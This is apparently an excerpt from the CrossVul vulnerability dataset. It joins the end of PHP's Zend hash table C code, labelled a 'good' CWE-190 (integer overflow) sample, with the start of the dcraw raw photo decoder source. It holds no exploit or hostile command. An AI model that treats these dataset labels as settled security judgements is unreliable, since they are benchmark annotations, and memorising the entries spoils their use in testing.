target->nNumOfElements = idx;
if (idx > 0 && target->nInternalPointer == HT_INVALID_IDX) {
target->nInternalPointer = 0;
}
}
return target;
}
ZEND_API void ZEND_FASTCALL _zend_hash_merge(HashTable *target, HashTable *source, copy_ctor_func_t pCopyConstructor, zend_bool overwrite ZEND_FILE_LINE_DC)
{
uint32_t idx;
Bucket *p;
zval *t;
IS_CONSISTENT(source);
IS_CONSISTENT(target);
HT_ASSERT(GC_REFCOUNT(target) == 1);
if (overwrite) {
for (idx = 0; idx < source->nNumUsed; idx++) {
p = source->arData + idx;
if (UNEXPECTED(Z_TYPE(p->val) == IS_UNDEF)) continue;
if (UNEXPECTED(Z_TYPE(p->val) == IS_INDIRECT) &&
UNEXPECTED(Z_TYPE_P(Z_INDIRECT(p->val)) == IS_UNDEF)) {
continue;
}
if (p->key) {
t = _zend_hash_add_or_update_i(target, p->key, &p->val, HASH_UPDATE | HASH_UPDATE_INDIRECT ZEND_FILE_LINE_RELAY_CC);
if (t && pCopyConstructor) {
pCopyConstructor(t);
}
} else {
t = zend_hash_index_update(target, p->h, &p->val);
if (t && pCopyConstructor) {
pCopyConstructor(t);
}
}
}
} else {
for (idx = 0; idx < source->nNumUsed; idx++) {
p = source->arData + idx;
if (UNEXPECTED(Z_TYPE(p->val) == IS_UNDEF)) continue;
if (UNEXPECTED(Z_TYPE(p->val) == IS_INDIRECT) &&
UNEXPECTED(Z_TYPE_P(Z_INDIRECT(p->val)) == IS_UNDEF)) {
continue;
}
if (p->key) {
t = _zend_hash_add_or_update_i(target, p->key, &p->val, HASH_ADD | HASH_UPDATE_INDIRECT ZEND_FILE_LINE_RELAY_CC);
if (t && pCopyConstructor) {
pCopyConstructor(t);
}
} else {
t = zend_hash_index_add(target, p->h, &p->val);
if (t && pCopyConstructor) {
pCopyConstructor(t);
}
}
}
}
if (target->nNumOfElements > 0) {
idx = 0;
while (Z_TYPE(target->arData[idx].val) == IS_UNDEF) {
idx++;
}
target->nInternalPointer = idx;
}
}
static zend_bool ZEND_FASTCALL zend_hash_replace_checker_wrapper(HashTable *target, zval *source_data, Bucket *p, void *pParam, merge_checker_func_t merge_checker_func)
{
zend_hash_key hash_key;
hash_key.h = p->h;
hash_key.key = p->key;
return merge_checker_func(target, source_data, &hash_key, pParam);
}
ZEND_API void ZEND_FASTCALL zend_hash_merge_ex(HashTable *target, HashTable *source, copy_ctor_func_t pCopyConstructor, merge_checker_func_t pMergeSource, void *pParam)
{
uint32_t idx;
Bucket *p;
zval *t;
IS_CONSISTENT(source);
IS_CONSISTENT(target);
HT_ASSERT(GC_REFCOUNT(target) == 1);
for (idx = 0; idx < source->nNumUsed; idx++) {
p = source->arData + idx;
if (UNEXPECTED(Z_TYPE(p->val) == IS_UNDEF)) continue;
if (zend_hash_replace_checker_wrapper(target, &p->val, p, pParam, pMergeSource)) {
t = zend_hash_update(target, p->key, &p->val);
if (t && pCopyConstructor) {
pCopyConstructor(t);
}
}
}
if (target->nNumOfElements > 0) {
idx = 0;
while (Z_TYPE(target->arData[idx].val) == IS_UNDEF) {
idx++;
}
target->nInternalPointer = idx;
}
}
/* Returns the hash table data if found and NULL if not. */
ZEND_API zval* ZEND_FASTCALL zend_hash_find(const HashTable *ht, zend_string *key)
{
Bucket *p;
IS_CONSISTENT(ht);
p = zend_hash_find_bucket(ht, key);
return p ? &p->val : NULL;
}
ZEND_API zval* ZEND_FASTCALL zend_hash_str_find(const HashTable *ht, const char *str, size_t len)
{
zend_ulong h;
Bucket *p;
IS_CONSISTENT(ht);
h = zend_inline_hash_func(str, len);
p = zend_hash_str_find_bucket(ht, str, len, h);
return p ? &p->val : NULL;
}
ZEND_API zend_bool ZEND_FASTCALL zend_hash_exists(const HashTable *ht, zend_string *key)
{
Bucket *p;
IS_CONSISTENT(ht);
p = zend_hash_find_bucket(ht, key);
return p ? 1 : 0;
}
ZEND_API zend_bool ZEND_FASTCALL zend_hash_str_exists(const HashTable *ht, const char *str, size_t len)
{
zend_ulong h;
Bucket *p;
IS_CONSISTENT(ht);
h = zend_inline_hash_func(str, len);
p = zend_hash_str_find_bucket(ht, str, len, h);
return p ? 1 : 0;
}
ZEND_API zval* ZEND_FASTCALL zend_hash_index_find(const HashTable *ht, zend_ulong h)
{
Bucket *p;
IS_CONSISTENT(ht);
if (ht->u.flags & HASH_FLAG_PACKED) {
if (h < ht->nNumUsed) {
p = ht->arData + h;
if (Z_TYPE(p->val) != IS_UNDEF) {
return &p->val;
}
}
return NULL;
}
p = zend_hash_index_find_bucket(ht, h);
return p ? &p->val : NULL;
}
ZEND_API zend_bool ZEND_FASTCALL zend_hash_index_exists(const HashTable *ht, zend_ulong h)
{
Bucket *p;
IS_CONSISTENT(ht);
if (ht->u.flags & HASH_FLAG_PACKED) {
if (h < ht->nNumUsed) {
if (Z_TYPE(ht->arData[h].val) != IS_UNDEF) {
return 1;
}
}
return 0;
}
p = zend_hash_index_find_bucket(ht, h);
return p ? 1 : 0;
}
ZEND_API void ZEND_FASTCALL zend_hash_internal_pointer_reset_ex(HashTable *ht, HashPosition *pos)
{
uint32_t idx;
IS_CONSISTENT(ht);
HT_ASSERT(&ht->nInternalPointer != pos || GC_REFCOUNT(ht) == 1);
for (idx = 0; idx < ht->nNumUsed; idx++) {
if (Z_TYPE(ht->arData[idx].val) != IS_UNDEF) {
*pos = idx;
return;
}
}
*pos = HT_INVALID_IDX;
}
/* This function will be extremely optimized by remembering
* the end of the list
*/
ZEND_API void ZEND_FASTCALL zend_hash_internal_pointer_end_ex(HashTable *ht, HashPosition *pos)
{
uint32_t idx;
IS_CONSISTENT(ht);
HT_ASSERT(&ht->nInternalPointer != pos || GC_REFCOUNT(ht) == 1);
idx = ht->nNumUsed;
while (idx > 0) {
idx--;
if (Z_TYPE(ht->arData[idx].val) != IS_UNDEF) {
*pos = idx;
return;
}
}
*pos = HT_INVALID_IDX;
}
ZEND_API int ZEND_FASTCALL zend_hash_move_forward_ex(HashTable *ht, HashPosition *pos)
{
uint32_t idx = *pos;
IS_CONSISTENT(ht);
HT_ASSERT(&ht->nInternalPointer != pos || GC_REFCOUNT(ht) == 1);
if (idx != HT_INVALID_IDX) {
while (1) {
idx++;
if (idx >= ht->nNumUsed) {
*pos = HT_INVALID_IDX;
return SUCCESS;
}
if (Z_TYPE(ht->arData[idx].val) != IS_UNDEF) {
*pos = idx;
return SUCCESS;
}
}
} else {
return FAILURE;
}
}
ZEND_API int ZEND_FASTCALL zend_hash_move_backwards_ex(HashTable *ht, HashPosition *pos)
{
uint32_t idx = *pos;
IS_CONSISTENT(ht);
HT_ASSERT(&ht->nInternalPointer != pos || GC_REFCOUNT(ht) == 1);
if (idx != HT_INVALID_IDX) {
while (idx > 0) {
idx--;
if (Z_TYPE(ht->arData[idx].val) != IS_UNDEF) {
*pos = idx;
return SUCCESS;
}
}
*pos = HT_INVALID_IDX;
return SUCCESS;
} else {
return FAILURE;
}
}
/* This function should be made binary safe */
ZEND_API int ZEND_FASTCALL zend_hash_get_current_key_ex(const HashTable *ht, zend_string **str_index, zend_ulong *num_index, HashPosition *pos)
{
uint32_t idx = *pos;
Bucket *p;
IS_CONSISTENT(ht);
if (idx != HT_INVALID_IDX) {
p = ht->arData + idx;
if (p->key) {
*str_index = p->key;
return HASH_KEY_IS_STRING;
} else {
*num_index = p->h;
return HASH_KEY_IS_LONG;
}
}
return HASH_KEY_NON_EXISTENT;
}
ZEND_API void ZEND_FASTCALL zend_hash_get_current_key_zval_ex(const HashTable *ht, zval *key, HashPosition *pos)
{
uint32_t idx = *pos;
Bucket *p;
IS_CONSISTENT(ht);
if (idx == HT_INVALID_IDX) {
ZVAL_NULL(key);
} else {
p = ht->arData + idx;
if (p->key) {
ZVAL_STR_COPY(key, p->key);
} else {
ZVAL_LONG(key, p->h);
}
}
}
ZEND_API int ZEND_FASTCALL zend_hash_get_current_key_type_ex(HashTable *ht, HashPosition *pos)
{
uint32_t idx = *pos;
Bucket *p;
IS_CONSISTENT(ht);
if (idx != HT_INVALID_IDX) {
p = ht->arData + idx;
if (p->key) {
return HASH_KEY_IS_STRING;
} else {
return HASH_KEY_IS_LONG;
}
}
return HASH_KEY_NON_EXISTENT;
}
ZEND_API zval* ZEND_FASTCALL zend_hash_get_current_data_ex(HashTable *ht, HashPosition *pos)
{
uint32_t idx = *pos;
Bucket *p;
IS_CONSISTENT(ht);
if (idx != HT_INVALID_IDX) {
p = ht->arData + idx;
return &p->val;
} else {
return NULL;
}
}
ZEND_API void zend_hash_bucket_swap(Bucket *p, Bucket *q)
{
zval val;
zend_ulong h;
zend_string *key;
ZVAL_COPY_VALUE(&val, &p->val);
h = p->h;
key = p->key;
ZVAL_COPY_VALUE(&p->val, &q->val);
p->h = q->h;
p->key = q->key;
ZVAL_COPY_VALUE(&q->val, &val);
q->h = h;
q->key = key;
}
ZEND_API void zend_hash_bucket_renum_swap(Bucket *p, Bucket *q)
{
zval val;
ZVAL_COPY_VALUE(&val, &p->val);
ZVAL_COPY_VALUE(&p->val, &q->val);
ZVAL_COPY_VALUE(&q->val, &val);
}
ZEND_API void zend_hash_bucket_packed_swap(Bucket *p, Bucket *q)
{
zval val;
zend_ulong h;
ZVAL_COPY_VALUE(&val, &p->val);
h = p->h;
ZVAL_COPY_VALUE(&p->val, &q->val);
p->h = q->h;
ZVAL_COPY_VALUE(&q->val, &val);
q->h = h;
}
ZEND_API int ZEND_FASTCALL zend_hash_sort_ex(HashTable *ht, sort_func_t sort, compare_func_t compar, zend_bool renumber)
{
Bucket *p;
uint32_t i, j;
IS_CONSISTENT(ht);
HT_ASSERT(GC_REFCOUNT(ht) == 1);
if (!(ht->nNumOfElements>1) && !(renumber && ht->nNumOfElements>0)) { /* Doesn't require sorting */
return SUCCESS;
}
if (ht->nNumUsed == ht->nNumOfElements) {
i = ht->nNumUsed;
} else {
for (j = 0, i = 0; j < ht->nNumUsed; j++) {
p = ht->arData + j;
if (UNEXPECTED(Z_TYPE(p->val) == IS_UNDEF)) continue;
if (i != j) {
ht->arData[i] = *p;
}
i++;
}
}
sort((void *)ht->arData, i, sizeof(Bucket), compar,
(swap_func_t)(renumber? zend_hash_bucket_renum_swap :
((ht->u.flags & HASH_FLAG_PACKED) ? zend_hash_bucket_packed_swap : zend_hash_bucket_swap)));
HANDLE_BLOCK_INTERRUPTIONS();
ht->nNumUsed = i;
ht->nInternalPointer = 0;
if (renumber) {
for (j = 0; j < i; j++) {
p = ht->arData + j;
p->h = j;
if (p->key) {
zend_string_release(p->key);
p->key = NULL;
}
}
ht->nNextFreeElement = i;
}
if (ht->u.flags & HASH_FLAG_PACKED) {
if (!renumber) {
zend_hash_packed_to_hash(ht);
}
} else {
if (renumber) {
void *new_data, *old_data = HT_GET_DATA_ADDR(ht);
Bucket *old_buckets = ht->arData;
new_data = pemalloc(HT_SIZE_EX(ht->nTableSize, HT_MIN_MASK), (ht->u.flags & HASH_FLAG_PERSISTENT));
ht->u.flags |= HASH_FLAG_PACKED | HASH_FLAG_STATIC_KEYS;
ht->nTableMask = HT_MIN_MASK;
HT_SET_DATA_ADDR(ht, new_data);
memcpy(ht->arData, old_buckets, sizeof(Bucket) * ht->nNumUsed);
pefree(old_data, ht->u.flags & HASH_FLAG_PERSISTENT & HASH_FLAG_PERSISTENT);
HT_HASH_RESET_PACKED(ht);
} else {
zend_hash_rehash(ht);
}
}
HANDLE_UNBLOCK_INTERRUPTIONS();
return SUCCESS;
}
static zend_always_inline int zend_hash_compare_impl(HashTable *ht1, HashTable *ht2, compare_func_t compar, zend_bool ordered) {
uint32_t idx1, idx2;
if (ht1->nNumOfElements != ht2->nNumOfElements) {
return ht1->nNumOfElements > ht2->nNumOfElements ? 1 : -1;
}
for (idx1 = 0, idx2 = 0; idx1 < ht1->nNumUsed; idx1++) {
Bucket *p1 = ht1->arData + idx1, *p2;
zval *pData1, *pData2;
int result;
if (Z_TYPE(p1->val) == IS_UNDEF) continue;
if (ordered) {
while (1) {
ZEND_ASSERT(idx2 != ht2->nNumUsed);
p2 = ht2->arData + idx2;
if (Z_TYPE(p2->val) != IS_UNDEF) break;
idx2++;
}
if (p1->key == NULL && p2->key == NULL) { /* numeric indices */
if (p1->h != p2->h) {
return p1->h > p2->h ? 1 : -1;
}
} else if (p1->key != NULL && p2->key != NULL) { /* string indices */
if (ZSTR_LEN(p1->key) != ZSTR_LEN(p2->key)) {
return ZSTR_LEN(p1->key) > ZSTR_LEN(p2->key) ? 1 : -1;
}
result = memcmp(ZSTR_VAL(p1->key), ZSTR_VAL(p2->key), ZSTR_LEN(p1->key));
if (result != 0) {
return result;
}
} else {
/* Mixed key types: A string key is considered as larger */
return p1->key != NULL ? 1 : -1;
}
pData2 = &p2->val;
idx2++;
} else {
if (p1->key == NULL) { /* numeric index */
pData2 = zend_hash_index_find(ht2, p1->h);
if (pData2 == NULL) {
return 1;
}
} else { /* string index */
pData2 = zend_hash_find(ht2, p1->key);
if (pData2 == NULL) {
return 1;
}
}
}
pData1 = &p1->val;
if (Z_TYPE_P(pData1) == IS_INDIRECT) {
pData1 = Z_INDIRECT_P(pData1);
}
if (Z_TYPE_P(pData2) == IS_INDIRECT) {
pData2 = Z_INDIRECT_P(pData2);
}
if (Z_TYPE_P(pData1) == IS_UNDEF) {
if (Z_TYPE_P(pData2) != IS_UNDEF) {
return -1;
}
} else if (Z_TYPE_P(pData2) == IS_UNDEF) {
return 1;
} else {
result = compar(pData1, pData2);
if (result != 0) {
return result;
}
}
}
return 0;
}
ZEND_API int zend_hash_compare(HashTable *ht1, HashTable *ht2, compare_func_t compar, zend_bool ordered)
{
int result;
IS_CONSISTENT(ht1);
IS_CONSISTENT(ht2);
HASH_PROTECT_RECURSION(ht1);
HASH_PROTECT_RECURSION(ht2);
result = zend_hash_compare_impl(ht1, ht2, compar, ordered);
HASH_UNPROTECT_RECURSION(ht1);
HASH_UNPROTECT_RECURSION(ht2);
return result;
}
ZEND_API zval* ZEND_FASTCALL zend_hash_minmax(const HashTable *ht, compare_func_t compar, uint32_t flag)
{
uint32_t idx;
Bucket *p, *res;
IS_CONSISTENT(ht);
if (ht->nNumOfElements == 0 ) {
return NULL;
}
idx = 0;
while (1) {
if (idx == ht->nNumUsed) {
return NULL;
}
if (Z_TYPE(ht->arData[idx].val) != IS_UNDEF) break;
idx++;
}
res = ht->arData + idx;
for (; idx < ht->nNumUsed; idx++) {
p = ht->arData + idx;
if (UNEXPECTED(Z_TYPE(p->val) == IS_UNDEF)) continue;
if (flag) {
if (compar(res, p) < 0) { /* max */
res = p;
}
} else {
if (compar(res, p) > 0) { /* min */
res = p;
}
}
}
return &res->val;
}
ZEND_API int ZEND_FASTCALL _zend_handle_numeric_str_ex(const char *key, size_t length, zend_ulong *idx)
{
register const char *tmp = key;
const char *end = key + length;
if (*tmp == '-') {
tmp++;
}
if ((*tmp == '0' && length > 1) /* numbers with leading zeros */
|| (end - tmp > MAX_LENGTH_OF_LONG - 1) /* number too long */
|| (SIZEOF_ZEND_LONG == 4 &&
end - tmp == MAX_LENGTH_OF_LONG - 1 &&
*tmp > '2')) { /* overflow */
return 0;
}
*idx = (*tmp - '0');
while (1) {
++tmp;
if (tmp == end) {
if (*key == '-') {
if (*idx-1 > ZEND_LONG_MAX) { /* overflow */
return 0;
}
*idx = 0 - *idx;
} else if (*idx > ZEND_LONG_MAX) { /* overflow */
return 0;
}
return 1;
}
if (*tmp <= '9' && *tmp >= '0') {
*idx = (*idx * 10) + (*tmp - '0');
} else {
return 0;
}
}
}
/*
* Local variables:
* tab-width: 4
* c-basic-offset: 4
* indent-tabs-mode: t
* End:
*/
| ./CrossVul/dataset_final_sorted/CWE-190/c/good_3089_0 |
crossvul-cpp_data_good_582_0 | #ifndef IGNOREALL
/*
dcraw.c -- Dave Coffin's raw photo decoder
Copyright 1997-2015 by Dave Coffin, dcoffin a cybercom o net
This is a command-line ANSI C program to convert raw photos from
any digital camera on any computer running any operating system.
No license is required to download and use dcraw.c. However,
to lawfully redistribute dcraw, you must either (a) offer, at
no extra charge, full source code* for all executable files
containing RESTRICTED functions, (b) distribute this code under
the GPL Version 2 or later, (c) remove all RESTRICTED functions,
re-implement them, or copy them from an earlier, unrestricted
Revision of dcraw.c, or (d) purchase a license from the author.
The functions that process Foveon images have been RESTRICTED
since Revision 1.237. All other code remains free for all uses.
*If you have not modified dcraw.c in any way, a link to my
homepage qualifies as "full source code".
$Revision: 1.476 $
$Date: 2015/05/25 02:29:14 $
*/
/*@out DEFINES
#ifndef USE_JPEG
#define NO_JPEG
#endif
#ifndef USE_JASPER
#define NO_JASPER
#endif
@end DEFINES */
#define NO_LCMS
#define DCRAW_VERBOSE
//@out DEFINES
#define DCRAW_VERSION "9.26"
#ifndef _GNU_SOURCE
#define _GNU_SOURCE
#endif
#define _USE_MATH_DEFINES
#include <ctype.h>
#include <errno.h>
#include <fcntl.h>
#include <float.h>
#include <limits.h>
#include <math.h>
#include <setjmp.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>
#include <sys/types.h>
//@end DEFINES
#if defined(DJGPP) || defined(__MINGW32__)
#define fseeko fseek
#define ftello ftell
#else
#define fgetc getc_unlocked
#endif
//@out DEFINES
#ifdef __CYGWIN__
#include <io.h>
#endif
#if defined WIN32 || defined (__MINGW32__)
#include <sys/utime.h>
#include <winsock2.h>
#pragma comment(lib, "ws2_32.lib")
#define snprintf _snprintf
#define strcasecmp stricmp
#define strncasecmp strnicmp
//@end DEFINES
typedef __int64 INT64;
typedef unsigned __int64 UINT64;
//@out DEFINES
#else
#include <unistd.h>
#include <utime.h>
#include <netinet/in.h>
typedef long long INT64;
typedef unsigned long long UINT64;
#endif
#ifdef NODEPS
#define NO_JASPER
#define NO_JPEG
#define NO_LCMS
#endif
#ifndef NO_JASPER
#include <jasper/jasper.h> /* Decode Red camera movies */
#endif
#ifndef NO_JPEG
#include <jpeglib.h> /* Decode compressed Kodak DC120 photos */
#endif /* and Adobe Lossy DNGs */
#ifndef NO_LCMS
#ifdef USE_LCMS
#include <lcms.h> /* Support color profiles */
#else
#include <lcms2.h> /* Support color profiles */
#endif
#endif
#ifdef LOCALEDIR
#include <libintl.h>
#define _(String) gettext(String)
#else
#define _(String) (String)
#endif
#ifdef LJPEG_DECODE
#error Please compile dcraw.c by itself.
#error Do not link it with ljpeg_decode.
#endif
#ifndef LONG_BIT
#define LONG_BIT (8 * sizeof (long))
#endif
//@end DEFINES
#if !defined(uchar)
#define uchar unsigned char
#endif
#if !defined(ushort)
#define ushort unsigned short
#endif
/*
All global variables are defined here, and all functions that
access them are prefixed with "CLASS". Note that a thread-safe
C++ class cannot have non-const static local variables.
*/
FILE *ifp, *ofp;
short order;
const char *ifname;
char *meta_data, xtrans[6][6], xtrans_abs[6][6];
char cdesc[5], desc[512], make[64], model[64], model2[64], artist[64],software[64];
float flash_used, canon_ev, iso_speed, shutter, aperture, focal_len;
time_t timestamp;
off_t strip_offset, data_offset;
off_t thumb_offset, meta_offset, profile_offset;
unsigned shot_order, kodak_cbpp, exif_cfa, unique_id;
unsigned thumb_length, meta_length, profile_length;
unsigned thumb_misc, *oprof, fuji_layout, shot_select=0, multi_out=0;
unsigned tiff_nifds, tiff_samples, tiff_bps, tiff_compress;
unsigned black, maximum, mix_green, raw_color, zero_is_bad;
unsigned zero_after_ff, is_raw, dng_version, is_foveon, data_error;
unsigned tile_width, tile_length, gpsdata[32], load_flags;
unsigned flip, tiff_flip, filters, colors;
ushort raw_height, raw_width, height, width, top_margin, left_margin;
ushort shrink, iheight, iwidth, fuji_width, thumb_width, thumb_height;
ushort *raw_image, (*image)[4], cblack[4102];
ushort white[8][8], curve[0x10000], cr2_slice[3], sraw_mul[4];
double pixel_aspect, aber[4]={1,1,1,1}, gamm[6]={ 0.45,4.5,0,0,0,0 };
float bright=1, user_mul[4]={0,0,0,0}, threshold=0;
int mask[8][4];
int half_size=0, four_color_rgb=0, document_mode=0, highlight=0;
int verbose=0, use_auto_wb=0, use_camera_wb=0, use_camera_matrix=1;
int output_color=1, output_bps=8, output_tiff=0, med_passes=0;
int no_auto_bright=0;
unsigned greybox[4] = { 0, 0, UINT_MAX, UINT_MAX };
float cam_mul[4], pre_mul[4], cmatrix[3][4], rgb_cam[3][4];
const double xyz_rgb[3][3] = { /* XYZ from RGB */
{ 0.412453, 0.357580, 0.180423 },
{ 0.212671, 0.715160, 0.072169 },
{ 0.019334, 0.119193, 0.950227 } };
const float d65_white[3] = { 0.950456, 1, 1.088754 };
int histogram[4][0x2000];
void (*write_thumb)(), (*write_fun)();
void (*load_raw)(), (*thumb_load_raw)();
jmp_buf failure;
struct decode {
struct decode *branch[2];
int leaf;
} first_decode[2048], *second_decode, *free_decode;
struct tiff_ifd {
int t_width, t_height, bps, comp, phint, offset, t_flip, samples, bytes;
int t_tile_width, t_tile_length,sample_format,predictor;
float t_shutter;
} tiff_ifd[10];
struct ph1 {
int format, key_off, tag_21a;
int t_black, split_col, black_col, split_row, black_row;
float tag_210;
} ph1;
#define CLASS
//@out DEFINES
#define FORC(cnt) for (c=0; c < cnt; c++)
#define FORC3 FORC(3)
#define FORC4 FORC(4)
#define FORCC for (c=0; c < colors && c < 4; c++)
#define SQR(x) ((x)*(x))
#define ABS(x) (((int)(x) ^ ((int)(x) >> 31)) - ((int)(x) >> 31))
#define MIN(a,b) ((a) < (b) ? (a) : (b))
#define MAX(a,b) ((a) > (b) ? (a) : (b))
#define LIM(x,min,max) MAX(min,MIN(x,max))
#define ULIM(x,y,z) ((y) < (z) ? LIM(x,y,z) : LIM(x,z,y))
#define CLIP(x) LIM((int)(x),0,65535)
#define SWAP(a,b) { a=a+b; b=a-b; a=a-b; }
#define my_swap(type, i, j) {type t = i; i = j; j = t;}
static float fMAX(float a, float b)
{
return MAX(a,b);
}
/*
In order to inline this calculation, I make the risky
assumption that all filter patterns can be described
by a repeating pattern of eight rows and two columns
Do not use the FC or BAYER macros with the Leaf CatchLight,
because its pattern is 16x16, not 2x8.
Return values are either 0/1/2/3 = G/M/C/Y or 0/1/2/3 = R/G1/B/G2
PowerShot 600 PowerShot A50 PowerShot Pro70 Pro90 & G1
0xe1e4e1e4: 0x1b4e4b1e: 0x1e4b4e1b: 0xb4b4b4b4:
0 1 2 3 4 5 0 1 2 3 4 5 0 1 2 3 4 5 0 1 2 3 4 5
0 G M G M G M 0 C Y C Y C Y 0 Y C Y C Y C 0 G M G M G M
1 C Y C Y C Y 1 M G M G M G 1 M G M G M G 1 Y C Y C Y C
2 M G M G M G 2 Y C Y C Y C 2 C Y C Y C Y
3 C Y C Y C Y 3 G M G M G M 3 G M G M G M
4 C Y C Y C Y 4 Y C Y C Y C
PowerShot A5 5 G M G M G M 5 G M G M G M
0x1e4e1e4e: 6 Y C Y C Y C 6 C Y C Y C Y
7 M G M G M G 7 M G M G M G
0 1 2 3 4 5
0 C Y C Y C Y
1 G M G M G M
2 C Y C Y C Y
3 M G M G M G
All RGB cameras use one of these Bayer grids:
0x16161616: 0x61616161: 0x49494949: 0x94949494:
0 1 2 3 4 5 0 1 2 3 4 5 0 1 2 3 4 5 0 1 2 3 4 5
0 B G B G B G 0 G R G R G R 0 G B G B G B 0 R G R G R G
1 G R G R G R 1 B G B G B G 1 R G R G R G 1 G B G B G B
2 B G B G B G 2 G R G R G R 2 G B G B G B 2 R G R G R G
3 G R G R G R 3 B G B G B G 3 R G R G R G 3 G B G B G B
*/
#define RAWINDEX(row, col) ((row)*raw_width + (col))
#define RAW(row,col) \
raw_image[(row)*raw_width+(col)]
//@end DEFINES
#define FC(row,col) \
(filters >> ((((row) << 1 & 14) + ((col) & 1)) << 1) & 3)
//@out DEFINES
#define BAYER(row,col) \
image[((row) >> shrink)*iwidth + ((col) >> shrink)][FC(row,col)]
#define BAYER2(row,col) \
image[((row) >> shrink)*iwidth + ((col) >> shrink)][fcol(row,col)]
//@end DEFINES
/* @out COMMON
#include <math.h>
#define CLASS LibRaw::
#include "libraw/libraw_types.h"
#define LIBRAW_LIBRARY_BUILD
#define LIBRAW_IO_REDEFINED
#include "libraw/libraw.h"
#include "internal/defines.h"
#include "internal/var_defines.h"
@end COMMON */
//@out COMMON
int CLASS fcol (int row, int col)
{
static const char filter[16][16] =
{ { 2,1,1,3,2,3,2,0,3,2,3,0,1,2,1,0 },
{ 0,3,0,2,0,1,3,1,0,1,1,2,0,3,3,2 },
{ 2,3,3,2,3,1,1,3,3,1,2,1,2,0,0,3 },
{ 0,1,0,1,0,2,0,2,2,0,3,0,1,3,2,1 },
{ 3,1,1,2,0,1,0,2,1,3,1,3,0,1,3,0 },
{ 2,0,0,3,3,2,3,1,2,0,2,0,3,2,2,1 },
{ 2,3,3,1,2,1,2,1,2,1,1,2,3,0,0,1 },
{ 1,0,0,2,3,0,0,3,0,3,0,3,2,1,2,3 },
{ 2,3,3,1,1,2,1,0,3,2,3,0,2,3,1,3 },
{ 1,0,2,0,3,0,3,2,0,1,1,2,0,1,0,2 },
{ 0,1,1,3,3,2,2,1,1,3,3,0,2,1,3,2 },
{ 2,3,2,0,0,1,3,0,2,0,1,2,3,0,1,0 },
{ 1,3,1,2,3,2,3,2,0,2,0,1,1,0,3,0 },
{ 0,2,0,3,1,0,0,1,1,3,3,2,3,2,2,1 },
{ 2,1,3,2,3,1,2,1,0,3,0,2,0,2,0,2 },
{ 0,3,1,0,0,2,0,3,2,1,3,1,1,3,1,3 } };
if (filters == 1) return filter[(row+top_margin)&15][(col+left_margin)&15];
if (filters == 9) return xtrans[(row+6) % 6][(col+6) % 6];
return FC(row,col);
}
static size_t local_strnlen(const char *s, size_t n)
{
const char *p = (const char *)memchr(s, 0, n);
return(p ? p-s : n);
}
/* add OS X version check here ?? */
#define strnlen(a,b) local_strnlen(a,b)
#ifdef LIBRAW_LIBRARY_BUILD
static int stread(char *buf, size_t len, LibRaw_abstract_datastream *fp)
{
int r = fp->read(buf,len,1);
buf[len-1] = 0;
return r;
}
#define stmread(buf,maxlen,fp) stread(buf,MIN(maxlen,sizeof(buf)),fp)
#endif
#ifndef __GLIBC__
char *my_memmem (char *haystack, size_t haystacklen,
char *needle, size_t needlelen)
{
char *c;
for (c = haystack; c <= haystack + haystacklen - needlelen; c++)
if (!memcmp (c, needle, needlelen))
return c;
return 0;
}
#define memmem my_memmem
char *my_strcasestr (char *haystack, const char *needle)
{
char *c;
for (c = haystack; *c; c++)
if (!strncasecmp(c, needle, strlen(needle)))
return c;
return 0;
}
#define strcasestr my_strcasestr
#endif
#define strbuflen(buf) strnlen(buf,sizeof(buf)-1)
//@end COMMON
void CLASS merror (void *ptr, const char *where)
{
if (ptr) return;
fprintf (stderr,_("%s: Out of memory in %s\n"), ifname, where);
longjmp (failure, 1);
}
void CLASS derror()
{
if (!data_error) {
fprintf (stderr, "%s: ", ifname);
if (feof(ifp))
fprintf (stderr,_("Unexpected end of file\n"));
else
fprintf (stderr,_("Corrupt data near 0x%llx\n"), (INT64) ftello(ifp));
}
data_error++;
}
//@out COMMON
ushort CLASS sget2 (uchar *s)
{
if (order == 0x4949) /* "II" means little-endian */
return s[0] | s[1] << 8;
else /* "MM" means big-endian */
return s[0] << 8 | s[1];
}
// DNG was written by:
#define CameraDNG 1
#define AdobeDNG 2
#ifdef LIBRAW_LIBRARY_BUILD
static int getwords(char *line, char *words[], int maxwords,int maxlen)
{
line[maxlen-1] = 0;
char *p = line;
int nwords = 0;
while(1)
{
while(isspace(*p)) p++;
if(*p == '\0') return nwords;
words[nwords++] = p;
while(!isspace(*p) && *p != '\0') p++;
if(*p == '\0') return nwords;
*p++ = '\0';
if(nwords >= maxwords) return nwords;
}
}
static ushort saneSonyCameraInfo(uchar a, uchar b, uchar c, uchar d, uchar e, uchar f){
if ((a >> 4) > 9) return 0;
else if ((a & 0x0f) > 9) return 0;
else if ((b >> 4) > 9) return 0;
else if ((b & 0x0f) > 9) return 0;
else if ((c >> 4) > 9) return 0;
else if ((c & 0x0f) > 9) return 0;
else if ((d >> 4) > 9) return 0;
else if ((d & 0x0f) > 9) return 0;
else if ((e >> 4) > 9) return 0;
else if ((e & 0x0f) > 9) return 0;
else if ((f >> 4) > 9) return 0;
else if ((f & 0x0f) > 9) return 0;
return 1;
}
static ushort bcd2dec(uchar data){
if ((data >> 4) > 9) return 0;
else if ((data & 0x0f) > 9) return 0;
else return (data >> 4) * 10 + (data & 0x0f);
}
